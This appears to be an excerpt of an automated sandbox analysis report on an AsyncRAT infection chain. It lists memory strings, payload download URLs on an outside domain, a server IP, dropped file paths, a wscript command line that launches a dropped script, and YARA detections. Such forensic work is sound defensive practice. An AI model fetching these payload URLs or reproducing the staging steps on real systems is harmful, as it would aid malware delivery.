0000001D.00000003.1954495939.0000000000584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPR
              Source: RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfW
              Source: tasklist.exe, 00000018.00000002.1939736709.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfl
              Source: msword.exe, 0000000E.00000002.1969463085.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfq
              Source: tasklist.exe, 00000016.00000002.1927426307.00000000031B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/mswor
              Source: choice.exe, 0000001E.00000002.1994159177.0000000003368000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001F.00000002.1953095483.0000000000880000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001F.00000002.1953228086.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000022.00000002.1955469418.0000000003120000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000022.00000002.1955529003.0000000003180000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851243617.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851607256.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3854974817.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.00000000014E2000.00000004.00000020.00020000.00000000.sdmp, c[1].bat.0.drString found in binary or memory: https://myguyapp.com/msword.zip
              Source: cmd.exe, 00000022.00000002.1955529003.0000000003180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip&Y5=J
              Source: RegAsm.exe, 00000029.00000002.3851904482.00000000014E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipPROCESSOR_ARCHITEW64
              Source: tasklist.exe, 00000016.00000002.1927254392.000000000302F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926535465.000000000302B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926600854.000000000302E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926304834.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_$
              Source: RegAsm.exe, 00000029.00000002.3851904482.00000000014E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPR
              Source: Carter.pif, 0000001D.00000002.3852624637.00000000016D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zipurl2=https:8X
              Source: mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/x
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: msword.exe, 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.globalsign.com/rea
              Source: msword.exe, 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.globalsign.com/reancel
              Source: Carter.pif.20.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: https://www.globalsign.com/repository/06
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49713 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004050CD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002E4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,29_2_002E4830
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00954830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,37_2_00954830
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002E4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,29_2_002E4632
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,14_2_004044A5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002FD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,29_2_002FD164
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0096D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,37_2_0096D164

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 29.3.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 29.3.Carter.pif.38bceb0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 41.2.RegAsm.exe.d50000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 29.2.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Drops large PE files
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile dump: msword.exe.13.dr 891289591Jump to dropped file
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Wscript called in batch mode (surpress errors)
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D4254: CreateFileW,DeviceIoControl,CloseHandle,29_2_002D4254
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,29_2_002C8F2E
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,14_2_00403883
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,29_2_002D5778
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00945778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,37_2_00945778
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\DistributionsPit
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\PrintersOngoing
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_0040497C14_2_0040497C
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_00406ED214_2_00406ED2
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004074BB14_2_004074BB
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0027B02029_2_0027B020
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002794E029_2_002794E0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00279C8029_2_00279C80
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002923F529_2_002923F5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002F840029_2_002F8400
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A650229_2_002A6502
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A265E29_2_002A265E
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0027E6F029_2_0027E6F0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029282A29_2_0029282A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A89BF29_2_002A89BF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002F0A3A29_2_002F0A3A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A6A7429_2_002A6A74
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00280BE029_2_00280BE0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029CD5129_2_0029CD51
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002CEDB229_2_002CEDB2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D8E4429_2_002D8E44
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002F0EB729_2_002F0EB7
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A6FE629_2_002A6FE6
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002933B729_2_002933B7
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029F40929_2_0029F409
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0028D45D29_2_0028D45D
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0028F62829_2_0028F628
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0027166329_2_00271663
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0027F6A029_2_0027F6A0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002916B429_2_002916B4
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002978C329_2_002978C3
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00291BA829_2_00291BA8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029DBA529_2_0029DBA5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A9CE529_2_002A9CE5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0028DD2829_2_0028DD28
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00291FC029_2_00291FC0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029BFD629_2_0029BFD6
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008EB02037_2_008EB020
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008E94E037_2_008E94E0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008E9C8037_2_008E9C80
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_009023F537_2_009023F5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0096840037_2_00968400
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0091650237_2_00916502
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008EE6F037_2_008EE6F0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0091265E37_2_0091265E
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090282A37_2_0090282A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_009189BF37_2_009189BF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00960A3A37_2_00960A3A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00916A7437_2_00916A74
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008F0BE037_2_008F0BE0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0093EDB237_2_0093EDB2
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090CD5137_2_0090CD51
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00960EB737_2_00960EB7
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00948E4437_2_00948E44
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00916FE637_2_00916FE6
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_009033B737_2_009033B7
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090F40937_2_0090F409
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008FD45D37_2_008FD45D
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_009016B437_2_009016B4
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008EF6A037_2_008EF6A0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008FF62837_2_008FF628
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008E166337_2_008E1663
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_009078C337_2_009078C3
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090DBA537_2_0090DBA5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00901BA837_2_00901BA8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00919CE537_2_00919CE5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_008FDD2837_2_008FDD28
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090BFD637_2_0090BFD6
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00901FC037_2_00901FC0
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_0139EC7C41_2_0139EC7C
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_01390FC841_2_01390FC8
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_0570B43041_2_0570B430
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_0570BD0041_2_0570BD00
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_0570EBB041_2_0570EBB0
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_0570B0E841_2_0570B0E8
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_057072B041_2_057072B0
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeCode function: 41_2_05700BA041_2_05700BA0
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\220239\Carter.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: String function: 00281A36 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: String function: 00298B30 appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: String function: 00290D17 appears 70 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: String function: 00908B30 appears 42 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: String function: 008F1A36 appears 34 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: String function: 00900D17 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: String function: 004062A3 appears 58 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: 29.3.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.3.Carter.pif.38bceb0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 41.2.RegAsm.exe.d50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.2.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, GKj04XVvJiEzT5.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, GKj04XVvJiEzT5.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, JbeTyT6ozehDZJ.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, JbeTyT6ozehDZJ.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, JbeTyT6ozehDZJ.csCryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
